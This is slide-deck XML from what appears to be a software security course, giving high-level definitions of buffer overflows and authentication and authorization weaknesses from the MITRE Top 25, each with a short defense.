                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C05BBE0-3635-99DA-6A38-23D066E79F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695680" y="8432828"/>
            <a:ext cx="11323352" cy="422124"/>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1" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28548700-CAC5-8CE1-FE90-96779065E441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659876" y="9643743"/>
            <a:ext cx="11359156" cy="333718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">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2" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEDF404B-7D21-5F7D-E555-FAD8E707FF67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659876" y="10047433"/>
            <a:ext cx="11359156" cy="333718"/>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3" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17478166-8DA9-5C6D-9B7D-5688569547DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12330551" y="6874608"/>
            <a:ext cx="11328426" cy="396604"/>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4" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D67B79-3BB3-B45A-45FD-B07BB986F69E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659876" y="12159937"/>
            <a:ext cx="11359156" cy="825814"/>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6" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DDB587B-F92E-4AEA-F234-6F5C581DAAB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12330551" y="5623074"/>
            <a:ext cx="11328426" cy="396604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">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7" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5808DA28-F341-62BD-339B-DA47DB77CAEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12330551" y="6073806"/>
            <a:ext cx="11328426" cy="396604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="21728"/>
            </a:srgb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8" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321031C0-3C1E-85AF-8010-F757010E7C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12309562" y="10484699"/>
            <a:ext cx="11323352" cy="910633"/>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9" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7055CC1-123A-62E8-A03A-1AED84F476E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12309562" y="6391514"/>
            <a:ext cx="11323352" cy="520328"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3616773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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>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5" grpId="0"/>
      <p:bldP spid="3" grpId="0" animBg="1"/>
      <p:bldP spid="2" grpId="0" animBg="1"/>
      <p:bldP spid="10"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5033776" y="555966"/>
            <a:ext cx="15609094" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="549148">
              <a:defRPr sz="10528"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>What is a buffer overflow?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Shape 315"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>A buffer overflow is a dangerous bug that affects programs written in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>C </a:t>
            </a:r>
            <a:r>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Normally</a:t>
            </a:r>
            <a:r>
              <a:t>, a program with this bug will simply</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> crash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>But an </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:t> can alter the situations that cause the program to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>do much worse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Steal</a:t>
            </a:r>
            <a:r>
              <a:t> private information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Corrupt</a:t>
            </a:r>
            <a:r>
              <a:t> valuable information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Run code</a:t>
            </a:r>
            <a:r>
              <a:t> of the attacker’s choice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="product_2011.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17014673" y="8591911"/>
            <a:ext cx="3453120" cy="3453120"/>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15">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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315">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315">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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315">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2" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>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1" build="p" animBg="1" advAuto="0"/>
      <p:bldP spid="316" grpId="2"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C71D9-C584-0541-9596-ADC8BEC038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930480A-A910-5727-9937-C4F86A052531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12327464" y="4812042"/>
            <a:ext cx="11323352" cy="8173708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4313BE33-30DD-DA61-080A-6B6B6AC09FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="656792" y="3246445"/>
            <a:ext cx="11363792" cy="9698934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D192C913-50C6-67CE-637D-25818B69377E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656790" y="7999487"/>
            <a:ext cx="11363792" cy="431009"/>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5" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA0AF58-579D-FCFC-7340-24EE249B2AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12363418" y="3498088"/>
            <a:ext cx="10979289" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Authentication and authorization issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6978E73-3CE2-524E-4C2A-8D2C2B251FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12327462" y="11458516"/>
            <a:ext cx="11323352" cy="740917"/>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6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FC2C07-34E4-F30F-66A1-99AB88D5854A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270863" y="730251"/>
            <a:ext cx="21759618" cy="2651126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>MITRE Top 25 Common Weakness Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65B8136C-AD35-A93C-97A4-C19C6C74BE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12341114" y="7342694"/>
            <a:ext cx="11363792" cy="360813"/>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29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A00761-2385-2177-3C77-948B429ED0B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12309562" y="9268515"/>
            <a:ext cx="11323352" cy="740917"/>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4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{352839A2-51CB-DB14-C452-4E08122975A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12315098" y="8164162"/>
            <a:ext cx="11363792" cy="351647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="21728"/>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0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1281764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23CE2-A489-A086-E1B5-667116026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526B4-196B-7AFA-4228-A624D37EC29F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C81158-0B52-909C-4209-856EB2AB9DAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630867" y="3134320"/>
            <a:ext cx="8364277" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Confirming a principal’s identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No authentication means: No identity-based access control, i.e., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>everyone has equal access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flaw? No check in the code, or incorrectly specified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defense: Use standard library, or identity provider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{229460C8-B9E3-9361-A67E-CE00007FD873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DFA3A1E-3C56-9DCC-B249-66904A9DC31D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16969562" y="3293372"/>
            <a:ext cx="7414437" cy="8882193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83B56504-D641-9AE2-9260-2198A55DCEAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9505507" y="3273072"/>
            <a:ext cx="7414436" cy="9025555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3208900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30F92-B89B-F4C4-E526-E878AE5C5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5CE85-332A-8125-4E0C-DE14EFDD6C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="625078"/>
            <a:ext cx="22392167" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9400" dirty="0"/>
              <a:t>Missing/Incorrect/Bypassed Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{875A6BAB-5ADC-FA4F-A009-D1266CB46EE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481471" y="3134320"/>
            <a:ext cx="10299403" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Confirming a principal is allowed to do a requested action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrong authorization means: Principal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>incorrectly allowed/denied access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How? Missing check, bug in code that does check, incorrect specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Authz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9643DE87-EF29-61DA-A6AA-55343F8E4696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546279EC-E607-5B4F-6FAE-78ED4D3826D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11935814" y="3134320"/>
            <a:ext cx="10607010" cy="8846390"/>
            <a:chOff x="11935814" y="3134320"/>
            <a:chExt cx="10607010" cy="8846390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C628C3C-A3E3-D4D7-4F0A-FA11A79074D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11935814" y="3134320"/>
              <a:ext cx="10607010" cy="8117345"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E86AAC7F-0E9E-4437-6997-7404898038B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14769092" y="11251665"/>
              <a:ext cx="4940454" cy="729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800" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                  <a:sym typeface="Helvetica Light"/>
                </a:rPr>
                <a:t>Bug in checking code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
